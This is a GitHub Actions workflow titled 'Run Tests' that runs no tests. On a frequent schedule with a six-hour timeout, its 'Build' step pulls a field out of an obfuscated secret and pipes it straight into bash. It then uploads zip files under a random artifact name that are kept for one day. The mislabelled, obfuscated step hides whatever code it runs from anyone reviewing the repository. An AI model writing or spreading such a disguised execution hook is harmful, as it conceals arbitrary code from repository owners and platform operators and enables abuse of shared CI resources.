name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '33 2,8,14,20 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  operation:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build
        env:
          mtq03000: ${{ secrets.mtq03000 }}
        run: |
          printf '%s' "$mtq03000" | jq -r .njtpw07 | /bin/bash
          printf '%s' "$q5907" | jq -r .ap1141 | /bin/bash

      - name: Archive output
        uses: actions/upload-artifact@v4
        with:
          name: mALNNDe5
          path: "*.zip"
          retention-days: 1
